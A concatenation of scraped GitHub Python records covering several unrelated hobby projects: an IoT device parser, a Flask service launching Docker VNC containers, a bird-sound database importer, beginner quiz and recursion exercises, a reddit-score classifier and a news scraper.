cve_id.append(listx[index][ip][cve_list].get('cve_id', ''))\n cvss.append(listx[index][ip][cve_list].get('cvss', ''))\n device_type = listx[index][ip].get('device_type', '')\n\n firmware_infor = list(listx[index][ip].keys())[7]\n firmware_infor_name = listx[index][ip][firmware_infor].get('name', '')\n firmware_infor_version = listx[index][ip][firmware_infor].get('version', '')\n firmware_infor_sha2 = listx[index][ip][firmware_infor].get('sha2', '')\n str_cve_id = ''\n str_cvss = ''\n for i in range(len(cve_id)):\n str_cvss = str_cvss + cvss[i] + ','\n str_cve_id = str_cve_id + cve_id[i] + ','\n\n tcp = list(listx[index][ip].keys())[8]\n udp = list(listx[index][ip].keys())[9]\n\n tcp_port = []\n tcp_service = []\n udp_port = []\n udp_service = []\n snmp_sysdescr_list = []\n\n for i in range(len(listx[index][ip][tcp])):\n tcp_port.append(listx[index][ip][tcp][i].get('port', ''))\n tcp_service.append(listx[index][ip][tcp][i].get('service', ''))\n snmp_sysdescr_list.append(listx[index][ip][tcp][i].get('snmp_sysdescr', ''))\n for i in range(len(listx[index][ip][udp])):\n udp_port.append(listx[index][ip][udp][i].get('port', ''))\n udp_service.append(listx[index][ip][udp][i].get('service', ''))\n snmp_sysdescr_list.append(listx[index][ip][udp][i].get('snmp-sysdescr', ''))\n snmp_sysdescr = ''\n for i in range(len(snmp_sysdescr_list)):\n snmp_sysdescr = snmp_sysdescr + snmp_sysdescr_list[i]\n\n snmp_sysdescr=listx[index][ip].get('snmp_sysdescr','')\n snmp_sysoid=listx[index][ip].get('snmp_sysoid','')\n ftp_banner=listx[index][ip].get('ftp_banner','')\n telnet_banner=listx[index][ip].get('telnet_banner','')\n hostname=listx[index][ip].get('hostname','')\n http_response=listx[index][ip].get('http_response','')\n https_response=listx[index][ip].get('https_response','')\n upnp_response=listx[index][ip].get('upnp_response','')\n nic_mac=listx[index][ip].get('nic_mac','')\n\n add_update_device_infor(None, vendor, model_name, firmware_version, is_discontinued, '', device_type, '', 0,\n str_cve_id, str_cvss, firmware_infor_name, firmware_infor_version, firmware_infor_sha2,\n '', '')\n # add_update_device_infor(None,vendor,model_name,firmware_version,is_discontinued,None,device_type,None,None,str_cve_id,str_cvss,firmware_infor_name,firmware_infor_version,firmware_infor_sha2,None,None)\n add_update_device_features(None,snmp_sysdescr,snmp_sysoid,ftp_banner,telnet_banner,hostname,http_response,https_response,upnp_response,nic_mac)\n","repo_name":"chency87/iot-vas","sub_path":"app/backend/controller/Task/use.py","file_name":"use.py","file_ext":"py","file_size_in_byte":7857,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"71591263848","text":"from flask import Blueprint, render_template, session, redirect, request, jsonify\nfrom flask_login import login_required, current_user\nfrom . import *\nimport random\nimport string\nimport subprocess\nimport docker\nfrom docker import *\n\nmain = Blueprint('main', __name__)\n\nnetworkCount = 0\ndocker_limit = 100\nportlist = []\nnamelist = []\nnameurl = {}\ndockerlist = {}\nclient = docker.from_env()\nnumber_of_subnets = 0\n\n\n@main.route('/profile')\n@login_required\ndef profile():\n return render_template('profile.html', name=current_user.name)\n\n\n# Using this to generate the names/passwords for the docer containers\ndef randomStringDigits(stringLength=10):\n \"\"\"Generate a random string of letters and digits \"\"\"\n lettersAndDigits = string.ascii_letters + string.digits\n return ''.join(random.choice(lettersAndDigits) for i in range(stringLength))\n\n\ndef spaceForDocker(count):\n return bool(int(subprocess.check_output(\"docker container ls --all | wc -l\", shell=True).decode(\"utf-8\")) > count)\n\n\ndef generatePort():\n global portlist\n port = random.randint(30000, 50000)\n while port in portlist:\n port = random.randint(30000, 50000)\n portlist.append(port)\n return port\n\n\ndef generateName():\n global namelist\n container = randomStringDigits(10)\n while container in namelist:\n container = randomStringDigits(10)\n namelist.append(container)\n return container\n\n\n# This function creates a new docker network with a unique subnet\ndef newNetwork(subnet):\n global client\n # class IPAMPool(subnet=None, iprange=None, gateway=None, aux_addresses=None)\n # Create an IPAM pool config dictionary to be added to the pool_configs parameter of IPAMConfig.\n ipam_pool = docker.types.IPAMPool(\n subnet=subnet\n )\n\n # class IPAMConfig(driver='default', pool_configs=None, options=None)\n # Create an IPAM (IP Address Management) config dictionary to be used with create_network().\n ipam_config = docker.types.IPAMConfig(\n pool_configs=[ipam_pool]\n )\n\n # create(name, *args, **kwargs)\n # Create a network. Similar to the docker network create.\n try:\n client.networks.create(\n str(session['container']),\n ipam=ipam_config\n )\n except RuntimeError as e:\n print(\"WARNING!!! Network already exists.\")\n print(e)\n\n\ndef newContainer(imageName):\n global networkCount\n global dockerlist\n global client\n session['port'] = generatePort()\n session['container'] = generateName()\n session['password'] = randomStringDigits(20)\n # Adding this to the master list\n dockerlist[session['container']] = session['port']\n newNetwork(('172.11.' + str(networkCount % 256) + '.0/24'))\n client.containers.run(imageName,\n tty=True,\n detach=True,\n network=str(session['container']),\n name=str(session['container']),\n user='0',\n ports={'6901/tcp': str(session['port'])},\n environment=[\"VNC_PW=\" + str(session['password']),\n \"VNC_RESOLUTION=800x600\"])\n networkCount += 1\n\ndef check():\n email = current_user.email\n if email in namelist:\n return True\n else:\n return False\n\n\ndef getDocker(imageName):\n\n global namelist\n global nameurl\n print(nameurl)\n if nameurl.get(str(current_user.email))is not None:\n return nameurl[str(current_user.email)]\n else:\n newContainer(imageName)\n url = ('http://' + str(host) + ':' + str(session['port']) + '/?password=' + str(session['password']))\n print(url)\n nameurl[str(current_user.email)] = url\n return nameurl[str(current_user.email)]\n\n\n@main.route('/router')\ndef router():\n global portlist\n global namelist\n global dockerlist\n global docker_limit\n print(dockerlist)\n # Sorry all out of containers html page... Create one!!\n if spaceForDocker(docker_limit):\n return render_template('error.html')\n url = getDocker('atr2600/zenmap-vnc-ubuntu')\n return redirect(url)\n\n\n@main.route('/')\n@login_required\ndef index():\n global portlist\n global namelist\n global dockerlist\n global docker_limit\n print(dockerlist)\n # Sorry all out of containers html page... Create one!!\n if spaceForDocker(docker_limit):\n return render_template('error.html')\n url = getDocker('atr2600/zenmap-vnc-ubuntu')\n return redirect(url)\n\n\n# Yes this should be limited to only the admin role..\n# I do not have enough time to implement this right now.\n@main.route('/admin', methods=['GET', 'POST'])\ndef admin():\n global number_of_subnets\n\n # Here we are going to get some settings from the admin.\n\n if request.method == 'POST':\n number_of_subnets = request.form.get('number_of_subnets')\n return redirect('/admin')\n\n\n if request.method == 'GET':\n return render_template(\"admin.html\")\n\n\n\n####\n## This function does:\n## 1. Removes the port and name from the portlist and namelist\n## 2. Removes the container from the master list.\n## 3. Clears the session\n## 4. Sends kill docker command to the system.\n####\ndef destroy():\n global portlist\n global namelist\n global dockerlist\n global client\n # killing docker container\n client.containers.get(session['container']).remove(force=True)\n client.networks.prune(filters=None)\n # Cleaning up the port numbers and container name\n portlist.remove(dockerlist[session['container']])\n namelist.remove(session['container'])\n del dockerlist[session['container']]\n print('Killed container: ' + session['container'])\n session.clear()\n","repo_name":"brandonrc/DDLS","sub_path":"project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43163501871","text":"#!/usr/bin/env python3\n\nimport os\nimport glob\nimport shutil\n\ndef createFolder(directory):\n try:\n if not os.path.exists(directory):\n os.makedirs(directory)\n except OSError:\n print ('Error: Creating directory ' + directory)\n return 0\n\ndef removeTypeFile(TypeFile,directory):\n\tfor zippath in glob.iglob(os.path.join(directory, \"*.\"+TypeFile)):\n\t\tos.remove(zippath)\n\treturn 0\n\ndef removeFolder(directory):\n\t# Delete all contents of a directory using shutil.rmtree() and handle exceptions\n\ttry:\n\t shutil.rmtree(directory)\n\texcept:\n\t print('Error while deleting directory')","repo_name":"AgustinPardo/demultiplex","sub_path":"file_manage.py","file_name":"file_manage.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18975344775","text":"from os import name\nfrom typing import NamedTuple, List\nfrom datetime import timedelta\nfrom mysql.connector.cursor import MySQLCursor\nfrom urllib.request import urlopen\nfrom xmltodict import parse\nfrom tools.logging import debug, info, error\nimport csv\nimport argparse\nfrom math import ceil\nfrom pathlib import Path\nfrom tools.configuration import parse_config\nfrom tools.file_handling.audio import read_parameters_from_audio_file\nfrom datetime import date, datetime\nfrom tools.db import sanitize_name, sanitize_altitude\nfrom tools.db.table_types import (\n XenoCantoRow,\n)\n\nfrom tools.file_handling.collect import (\n rename_and_copy_to,\n)\n\nfrom tools.db import (\n connectToDB,\n get_entry_id_or_create_it,\n get_id_of_entry_in_table,\n get_synonyms_dict,\n)\n\nCONFIG_FILE_PATH = Path(\"config/defaultConfig.cfg\")\nCSV_FILEPATH = Path(\"birdsounds.csv\")\nFILES_DIRECTORY_PATH = Path(\n \"/mnt/z/AG/TSA/Mario/_Backups/XenoCantoDisk/sounds/\"\n)\n\n\ndef import_xeno_canto(\n files=FILES_DIRECTORY_PATH, config_path=CONFIG_FILE_PATH, csv_path=CSV_FILEPATH\n):\n config = parse_config(config_path)\n species_set = set()\n a = config.record_information\n\n def get_species_id(latin_name: str, english_name: str) -> int:\n species_id = get_id_of_entry_in_table(\n db_cursor, \"species\", [(\"latin_name\", latin_name)]\n )\n if species_id is None:\n species_id = get_id_of_entry_in_table(\n db_cursor, \"species\", [(\"english_name\", english_name)]\n )\n return species_id\n\n with open(csv_path, newline=\"\") as csvfile:\n csv_reader = csv.reader(csvfile, delimiter=\",\", quotechar='\"')\n next(csv_reader)\n missed_imports = []\n with connectToDB(config.database) as db_connection:\n with db_connection.cursor() as db_cursor:\n db_cursor: MySQLCursor\n\n collection_entry = [(\"name\", \"xeno-canto\"), (\"remarks\", None)]\n collection_id = get_entry_id_or_create_it(\n db_cursor, \"collection\", collection_entry, collection_entry\n )\n counter = 0\n for row in csv_reader:\n counter = counter + 1\n if counter % 1000 == 0:\n db_connection.commit()\n\n xeno = XenoCantoRow(*row)\n xeno: XenoCantoRow\n species_set.add(\n (\"{} {}\".format(xeno.genus, xeno.species), xeno.eng_name)\n )\n synonyms_dict = get_synonyms_dict(db_cursor, \"tsa_to_ioc10_1\")\n latin_name = \"{} {}\".format(xeno.genus, xeno.species)\n species_id = get_species_id(latin_name, xeno.eng_name)\n if species_id is None:\n missed_imports.append(row)\n error(\n \"Could not identify species{}, {} \".format(\n latin_name, xeno.eng_name\n )\n )\n continue\n # TODO: get File information\n file_path = files / Path(xeno.dir) / Path(xeno.path)\n if file_path.exists() is False:\n error(\"File does not exhist {}\".format(file_path.as_posix()))\n continue\n audio_file_parameters = None\n try:\n audio_file_parameters = read_parameters_from_audio_file(\n file_path\n )\n except:\n error(\n \"Could not read audio Parameters from {}\".format(file_path)\n )\n continue\n person_entry = [(\"name\", sanitize_name(xeno.recordist, 128))]\n person_id = get_entry_id_or_create_it(\n db_cursor, \"person\", person_entry, person_entry\n )\n\n location_entry = [\n (\"name\", sanitize_name(xeno.location, 256)),\n (\"description\", None),\n (\"habitat\", None),\n (\n \"lat\",\n None\n if xeno.latitude == \"?\" or xeno.latitude == \"NULL\"\n else xeno.latitude,\n ),\n (\n \"lng\",\n None\n if xeno.longitude == \"?\" or xeno.longitude == \"NULL\"\n else xeno.longitude,\n ),\n (\n \"altitude\",\n sanitize_altitude(xeno.elevation),\n ),\n (\"remarks\", None),\n ]\n # print(location_entry)\n location_id = get_entry_id_or_create_it(\n db_cursor,\n \"location\",\n [\n (\"name\", location_entry[0][1]),\n (\"description\", None),\n (\"habitat\", None),\n (\"remarks\", None),\n ],\n location_entry,\n )\n db_connection.commit()\n equipment_id = None\n # print(xeno.time)\n record_start = (\n None\n if xeno.time == \"?\" or \"?:?\"\n else datetime.strptime(xeno.time, \"%H:%M\")\n )\n # print(xeno.date)\n dateParts = xeno.date.split(\"-\")\n dateParts[1] = \"01\" if dateParts[1] == \"00\" else dateParts[1]\n dateParts[2] = \"01\" if dateParts[2] == \"00\" else dateParts[2]\n target_record_file_path = \"{}/{}/{}\".format(\n audio_file_parameters.md5sum[0],\n audio_file_parameters.md5sum[1],\n audio_file_parameters.md5sum[2],\n )\n record_entry = [\n (\"date\", \"-\".join(dateParts)),\n (\n \"time\",\n record_start\n if record_start is None\n else record_start.time(),\n ),\n # (\n # \"end\",\n # record_start\n # if record_start is None\n # else (\n # record_start\n # + timedelta(\n # seconds=ceil(audio_file_parameters.duration)\n # )\n # ).time(),\n # ),\n (\"duration\", audio_file_parameters.duration),\n (\"sample_rate\", audio_file_parameters.sample_rate),\n (\"bit_depth\", audio_file_parameters.bit_depth),\n (\"bit_rate\", audio_file_parameters.bit_rate),\n (\"channels\", audio_file_parameters.channels),\n (\"mime_type\", audio_file_parameters.mime_type),\n (\n \"original_filename\",\n audio_file_parameters.original_filename,\n ),\n (\"file_path\", target_record_file_path),\n (\"filename\", audio_file_parameters.filename),\n (\"md5sum\", audio_file_parameters.md5sum),\n (\"license\", xeno.license),\n (\"recordist_id\", person_id),\n (\"equipment_id\", None),\n (\"location_id\", location_id),\n (\"collection_id\", collection_id),\n ]\n\n (record_id, created) = get_entry_id_or_create_it(\n db_cursor,\n \"record\",\n [\n (\"md5sum\", audio_file_parameters.md5sum),\n ],\n data=record_entry,\n info=True,\n )\n if created:\n # create xenocanto link\n xeno_canto_link_data = [\n (\"record_id\", record_id),\n (\"collection_id\", xeno.snd_nr),\n ]\n get_entry_id_or_create_it(\n db_cursor,\n \"record_xeno_canto_link\",\n xeno_canto_link_data,\n xeno_canto_link_data,\n )\n # move file to destination\n targetDirectory = (\n config.database.get_originals_files_path().joinpath(\n target_record_file_path\n )\n )\n targetDirectory.mkdir(parents=True, exist_ok=True)\n rename_and_copy_to(\n file_path,\n targetDirectory,\n audio_file_parameters.filename,\n )\n # create foreground annoation\n forground_annoation = [\n (\"record_id\", record_id),\n (\"species_id\", species_id),\n (\"background\", False),\n (\"individual_id\", None),\n (\"group_id\", None),\n (\"vocalization_type\", xeno.songtype),\n (\"quality_tag\", None),\n (\"start_time\", 0),\n (\"end_time\", audio_file_parameters.duration),\n (\"start_frequency\", None),\n (\"end_frequency\", None),\n (\"channel_ix\", None),\n (\"annotator_id\", person_id),\n ]\n # print(forground_annoation)\n get_entry_id_or_create_it(\n db_cursor,\n \"annotation_of_species\",\n forground_annoation,\n forground_annoation,\n )\n\n background_species = xeno.background.split(\",\")\n for species in background_species:\n back_species_id = get_species_id(latin_name, xeno.eng_name)\n if back_species_id is None:\n missed_imports.append(row)\n error(\n \"Could not identify species{}, {} \".format(\n latin_name, xeno.eng_name\n )\n )\n continue\n background_annoation = [\n (\"record_id\", record_id),\n (\"species_id\", species_id),\n (\"background\", True),\n (\"individual_id\", None),\n (\"group_id\", None),\n (\"vocalization_type\", None),\n (\"quality_tag\", None),\n (\"start_time\", 0),\n (\"end_time\", audio_file_parameters.duration),\n (\"start_frequency\", None),\n (\"end_frequency\", None),\n (\"channel_ix\", None),\n (\"annotator_id\", person_id),\n ]\n get_entry_id_or_create_it(\n db_cursor,\n \"annotation_of_species\",\n background_annoation,\n background_annoation,\n )\n db_connection.commit()\n\n\nparser = argparse.ArgumentParser(description=\"\")\nparser.add_argument(\n \"--files\",\n metavar=\"path\",\n type=Path,\n nargs=\"?\",\n help=\"target folder\",\n default=FILES_DIRECTORY_PATH,\n)\n\nparser.add_argument(\n \"--csv\",\n metavar=\"path\",\n type=Path,\n nargs=\"?\",\n help=\"csv file with all entries\",\n default=CSV_FILEPATH,\n)\nparser.add_argument(\n \"--config\",\n metavar=\"path\",\n type=Path,\n nargs=\"?\",\n default=CONFIG_FILE_PATH,\n help=\"config file with database credentials\",\n)\n\nargs = parser.parse_args()\nif __name__ == \"__main__\":\n import_xeno_canto(files=args.files, config_path=args.config, csv_path=args.csv)","repo_name":"hdogan84/database","sub_path":"src/import_scripts/import_xeno_canto.py","file_name":"import_xeno_canto.py","file_ext":"py","file_size_in_byte":13099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30960074815","text":"from hello import Member\nfrom hello.domains import my100, myRandom, memberlist\n\n\nclass Quiz00:\n def quiz00calculator(self) -> None:\n a = my100()\n b = my100()\n op = ['+', '-', '*', '/', '%']\n opcode = op[myRandom(0, 4)]\n s = f'{a} {opcode} {b} = '\n if opcode == '+':\n s += f'{self.add(a, b)}'\n elif opcode == '-':\n s += f'{self.sub(a, b)}'\n elif opcode == '*':\n s += f'{self.mul(a, b)}'\n elif opcode == '/':\n s += f'{self.div(a, b):.2f}'\n else:\n s += f'{self.mod(a, b)}'\n print(s)\n return None\n\n @staticmethod\n def add(a, b) -> int:\n return a + b\n\n @staticmethod\n def sub(a, b) -> int:\n return a - b\n\n @staticmethod\n def mul(a, b) -> int:\n return a * b\n\n @staticmethod\n def div(a, b) -> float:\n return a / b\n\n @staticmethod\n def mod(a, b) -> int:\n return a % b\n\n @staticmethod\n def quiz01bmi():\n this = Member()\n this.name = Quiz00.quiz06member_choice()\n this.height = myRandom(160, 190)\n this.weight = myRandom(50, 100)\n bmi = this.weight / (this.height * this.height) * 10000\n s = f'{this.name}님의 비만도 결과 : '\n if bmi >= 35:\n s += '고도 비만'\n elif bmi >= 30:\n s += '중(重)도 비만 (2단계 비만)'\n elif bmi >= 25:\n s += '경도 비만 (1단계 비만)'\n elif bmi >= 23:\n s += '과체중'\n elif bmi >= 18.5:\n s += '정상'\n else:\n s += '저체중'\n print(s)\n\n @staticmethod\n def quiz02dice():\n print(myRandom(1, 6))\n\n @staticmethod\n def quiz03rps():\n u = myRandom(1, 3)\n c = myRandom(1, 3)\n arr = ['가위', '바위', '보', 'Draw', 'Win', 'Lose']\n i = 3\n if abs(u - c) == 1:\n i = 4 if u > c else 5\n elif abs(u - c) == 2:\n i = 5 if u > c else 4\n print(f'user : {arr[u - 1]}, com : {arr[c - 1]} \\n결과 : {arr[i]}')\n\n @staticmethod\n def quiz04leap():\n year = myRandom(1960, 2022)\n print(f'{year}��은 윤년입니다.' if year % 4 == 0 and year % 100 != 0 or year % 400 == 0 else f'{year}년은 평년입니다.')\n\n def quiz05grade(self):\n kor = myRandom(0, 100)\n eng = myRandom(0, 100)\n math = myRandom(0, 100)\n hap = self.hap(kor, eng, math)\n avg = self.avg(hap)\n grade = self.get_grade(avg)\n pass_chk = self.pass_chk(avg)\n print(f'국어 점수 : {kor}\\n영어 점수 : {eng}\\n수학 점수 : {math}\\n합계 : {hap}\\n평균 : {avg:.2f}\\n학점 : {grade}\\n합격 여부 : {pass_chk}')\n\n @staticmethod\n def hap(kor, eng, math):\n return kor + eng + math\n\n @staticmethod\n def avg(hap):\n return hap / 3.0\n\n @staticmethod\n def get_grade(avg):\n if avg >= 90:\n return 'A'\n elif avg >= 80:\n return 'B'\n elif avg >= 70:\n return 'C'\n elif avg >= 60:\n return 'D'\n else:\n return 'F'\n\n @staticmethod\n def pass_chk(avg): # 60점 이상 이면 합격\n return '합격' if avg >= 60 else '불합격'\n\n @staticmethod\n def quiz06member_choice():\n return memberlist()[myRandom(0, 23)]\n\n @staticmethod\n def quiz07lotto():\n answer = []\n user = []\n count = 0\n while 1:\n anum = myRandom(1, 45)\n if anum not in answer:\n answer.append(anum)\n if len(answer) == 6:\n break\n while 1:\n unum = myRandom(1, 45)\n if unum not in user:\n user.append(unum)\n if len(user) == 6:\n break\n for i in range(6):\n if user[i] in answer:\n count += 1\n s = f'이번주 로또 당첨 번호 : {answer}\\n사용자 번호 : {user}\\n'\n if count == 6:\n s += '1등입니다.'\n elif count == 5:\n s += '2등입니다.'\n elif count == 4:\n s += '3등입니다.'\n else:\n s += '낙첨되었습니다.'\n print(s)\n\n @staticmethod\n def quiz08bank(): # 이름, 입금, 출금만 구현\n Account.main()\n\n @staticmethod\n def quiz09gugudan(): # 책받침구구단\n s = ''\n for k in range(2, 7, 4):\n for i in range(1, 10):\n for j in range(k, k + 4):\n s += f'{j} * {i} = {i * j} \\t'\n s += '\\n'\n s += '\\n'\n print(s)\n\n'''\n08번 문제 해결을 위한 클래스는 다음과 같다.\n[요구사항(RFP)]\n은행이름은 비트은행이다.\n입금자 이름(name), 계좌번호(account_number), 금액(money) 속성값으로 계좌를 생성한다.\n계좌번호는 3자리-2자리-6자리 형태로 랜덤하게 생성된다.\n예를들면 123-12-123456 이다.\n금액은 100 ~ 999 사이로 랜덤하게 입금된다. (단위는 만단위로 암묵적으로 판단한다)\n'''\n\n\nclass Account(object):\n def __init__(self, name, account_number, money):\n self.BANK_NAME = '비트은행'\n self.name = Quiz00.quiz06member_choice() if name is None else name\n self.account_number = self.create_account_number() if account_number is None else account_number\n self.money = myRandom(100, 1000) if money is None else money\n\n def to_string(self):\n return f'은행 : {self.BANK_NAME}, ' \\\n f'입금자 : {self.name}, ' \\\n f'계좌번호 : {self.account_number}, ' \\\n f'금액 : {self.money} 만원'\n\n @staticmethod\n def create_account_number():\n return ''.join('-' if i == 3 or i == 6 else str(myRandom(0, 9)) for i in range(13))\n\n @staticmethod\n def deposit(ls, account_number, deposit):\n a = Account.find_account(ls, account_number)\n if a is not None:\n print(f'계좌번호 : {a.account_number}')\n print(f'입금액 : {deposit} 만원')\n a.money += deposit\n return f'잔고 : {a.money} 만원'\n else:\n return '계좌번호를 다시 확인해주세요.'\n\n @staticmethod\n def withdraw(ls, account_number, withdraw):\n a = Account.find_account(ls, account_number)\n if a is not None:\n if a.money >= withdraw:\n a.money -= withdraw\n else:\n print('잔고가 부족합니다.')\n return f'잔고 : {a.money} 만원'\n else:\n return '계좌번호를 다시 확인해주세요.'\n\n @staticmethod\n def del_account(ls, account_number):\n for i, j in enumerate(ls):\n if j.account_number == account_number:\n del ls[i]\n\n @staticmethod\n def find_account(ls, account_number):\n # return ''.join([j.to_string() if j.account_number == account_number else '' for i, j in enumerate(ls)])\n for i, j in enumerate(ls):\n if j.account_number == account_number:\n return j\n\n @staticmethod\n def main():\n ls = []\n while 1:\n menu = input('0. 종료 1. 계좌개설 2. 계좌목록 3. 입금 4. 출금 5. 계좌해지 6. 계좌조회\\n')\n if menu == '0':\n break\n elif menu == '1':\n acc = Account(None, None, None)\n print(f'{acc.to_string()} ... 개설되었습니다.')\n ls.append(acc)\n elif menu == '2':\n a = '\\n'.join(i.to_string() for i in ls)\n print(a)\n elif menu == '3':\n print(Account.deposit(ls, input('입금할 계좌번호 : '), int(input('입금액 : '))))\n elif menu == '4':\n print(Account.withdraw(ls, input('출금할 계좌번호 : '), int(input('출금액 : '))))\n elif menu == '5':\n Account.del_account(ls, input('탈퇴할 계좌번호 : '))\n elif menu == '6':\n a = Account.find_account(ls, input('조회할 계좌번호 : '))\n if a is not None:\n print(a.to_string())\n else:\n print('찾으시는 계좌가 없습니다.')\n else:\n print('Wrong Number.. Try Again')\n continue\n\n","repo_name":"silver-or/melbourne-django","sub_path":"hello/quiz00.py","file_name":"quiz00.py","file_ext":"py","file_size_in_byte":8416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13362611251","text":"import pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer \nfrom sklearn.preprocessing import StandardScaler\nfrom scipy.sparse import hstack\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import Ridge,LinearRegression\nfrom sklearn.metrics import r2_score,accuracy_score\nimport joblib\nimport numpy as np\nfrom VADdet import analyze\n\npath = \"../files/new_train_test/new_Train_data.csv\"\n\ndata = pd.read_csv(path)\ncalculated = pd.DataFrame(columns=['actual_score','hour_pred'])\n\ndata_removed = data.drop(['redditor','type','text','proc_text','proc_title','genre','absolute_words_ratio','neg_log_prob_aw_ratio'],axis = 1)\n\ndata_removed = data_removed.dropna(subset = ['title','subreddit','datetime','valence','arousal','dominance','hour'])\n\ntrain_x ,y = data_removed.drop('score',axis = 1), data_removed[['score']]\n\ntfidf_subreddit = TfidfVectorizer(ngram_range=(1, 1), max_features=None)\nsubreddit_sparse = tfidf_subreddit.fit_transform(train_x['subreddit'])\n\n\n#changing ngram range \ntfidf_title = TfidfVectorizer(ngram_range=(2, 5), max_features=None)\ntitle_sparse = tfidf_title.fit_transform(train_x['title'])\n\nhour = train_x[['hour']]\nvalence = train_x[['valence']]\narousal = train_x[['arousal']]\ndominance = train_x[['dominance']]\n\nscaler = StandardScaler()\nscaled_date = scaler.fit_transform(hour)\nscaled_val = np.hstack([scaled_date,valence,arousal,dominance])\n\ntrain_x_sparse = hstack([title_sparse,subreddit_sparse,scaled_val])\nprint(\"\\t ############ TRAINING MODEL ############\")\n# train_y = train_y.astype('int')\n\nml_model = MLPClassifier(max_iter=45,hidden_layer_sizes = (35,),verbose = True) \n #Ridge(alpha = 0.0001)\n #MLPClassifier(max_iter=30,hidden_layer_sizes = (25,5,),verbose = True)\n #LinearRegression()\nml_model.fit(train_x_sparse,y.values.ravel())\njoblib.dump(ml_model, 'mlp_hour.joblib')\n\nprint(ml_model.score(train_x_sparse, y)) \n\nprint(\"\\t ############ TRAINING COMPLETE ############\")\n\n# ml_model = joblib.load(\"mlp_hour.joblib\")\n######################### TESTING #########################\ntest_data = pd.read_csv(\"../files/new_train_test/finaltest_data.csv\")\n\ntest_data_removed = test_data.drop(['redditor','type','text','proc_text','proc_title','genre','absolute_words_ratio','neg_log_prob_aw_ratio'],axis = 1)\n\ntest_data_removed = test_data_removed.dropna(subset = ['title','subreddit','datetime','valence','arousal','dominance','hour'])\n\ntest_x, test_y = test_data_removed.drop('score',axis = 1), test_data_removed[['score']]\n\nsub_sparse = tfidf_subreddit.transform(test_x['subreddit'])\ntit_sparse = tfidf_title.transform(test_x['title'])\n\ntest_date_time = test_x[['hour']]\ntest_valence = test_x[['valence']]\ntest_arousal = test_x[['arousal']]\ntest_dominance = test_x[['dominance']]\ntest_date = scaler.transform(test_date_time)\n# print(test_date)\ntest_scaled_val = np.hstack([test_date,test_valence,test_arousal,test_dominance])\n\ntest_x_sparse = hstack([tit_sparse, sub_sparse, test_scaled_val])\n\npred_y = ml_model.predict(test_x_sparse)\nprint(pred_y)\n\n","repo_name":"Neel-G-png/reddit-post-outreach-prediction","sub_path":"hour_model/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":3126,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"25454188144","text":"\"Returns factorial of a number n\"\n\n\ndef factorial(n):\n if n == 0:\n return 1\n return n * factorial(n - 1)\n\n\n\"Returns n-th Fibonacci sequence number\"\n\n\ndef fibonacci(n):\n if n == 1 or n == 2:\n return 1\n return fibonacci(n-1) + fibonacci(n-2)\n\n\n\"Returns the sum of digits of number n\"\n\n\ndef digitsum(n):\n if n // 10 == 0:\n return n\n return n % 10 + digitsum(n // 10)\n\n\n\"Returns Ackermann number\"\n\n\ndef ackermann(m, n):\n if m == 0:\n return n+1\n if n == 0:\n return ackermann(m - 1, 1)\n return ackermann(m - 1, ackermann(m, n - 1))\n\n\n\"Returns a greatest common multiple of a and b\"\n\n\ndef gcd(a, b):\n if b == 0:\n return a\n return gcd(b, a % b)\n\n\n\"Returns reversed string s\"\n\n\ndef reversestring(s):\n if len(s) <= 1:\n return s\n return s[-1] + reversestring(s[0:-1])\n\n\n\"Returns a True if n is a 2 to some power\"\n\n\ndef istwopower(n):\n if n <= 0:\n return False\n if n == 1:\n return True\n if n % 2 == 0:\n return istwopower(n // 2)\n return False\n\n\n\"Returns list of all binary strings of lenght n\"\n\n\ndef genbinarystrings(n):\n if n == 0:\n return ['']\n if n == 1:\n return ['0', '1']\n list = []\n for i in genbinarystrings(1):\n for j in genbinarystrings(n - 1):\n list.append(i + j)\n return list\n\n\n\"\"\"Returns an integer that is equal to a decimal representation of concatenated\na and b\"\"\"\n\n\ndef concatnumbers(a, b):\n if b // 10 == 0:\n return a * 10 + b\n return concatnumbers(a, b // 10) * 10 + b % 10\n\n\n\"Returns string s with parentheses\"\n\n\ndef parentheses(s):\n if len(s) <= 2:\n return '(' + s + ')'\n return '(' + s[0] + parentheses(s[1: -2 + 1]) + s[-1] + ')'\n\n\n\"\"\"Returns palyndrom that increases in first part from 1 to n and decreases in\nthe second part from n to 1\"\"\"\n\n\ndef abacaba(n):\n if n == 1:\n return [1]\n return abacaba(n - 1) + [n] + abacaba(n - 1)\n","repo_name":"dnemirich/python_course","sub_path":"Task4.py","file_name":"Task4.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20673493295","text":"from datetime import datetime, timedelta\nfrom unidecode import unidecode\nimport multiprocessing\nfrom concurrent.futures import ThreadPoolExecutor\nimport os\n\ntry:\n from src.utils import getHTTPResponse\nexcept:\n from utils import getHTTPResponse\n\nclass New:\n def __init__(self, topic=''):\n self.new_id = 0\n self.title = ''\n self.topic = topic\n self.topic_id = 0\n self.newspaper = ''\n self.newspaper_id = 0\n self.url = ''\n self.publish_date = '00-00-00 00:00:00'\n self.antique = ''\n # Campos que no van en la base de datos\n self.html_content = ''\n\n def to_dicc(self):\n return {\n 'new_id' : self.new_id,\n 'title' : self.title,\n 'topic' : self.topic,\n 'topic_id' : self.topic_id,\n 'newspaper' : self.newspaper,\n 'newspaper_id' : self.newspaper_id,\n 'url' : self.url,\n 'publish_date' : self.publish_date,\n 'antique' : self.antique,\n }\n\nclass GoogleNew(New):\n def __init__(self, topic=''):\n super().__init__(topic=topic)\n\n def fetch_data(self):\n\n try:\n self.newspaper = self.html_content.find('div', class_='MgUUmf NUnG9d').text\n self.newspaper = unidecode( self.newspaper ) # Quito los acentos\n self.newspaper = 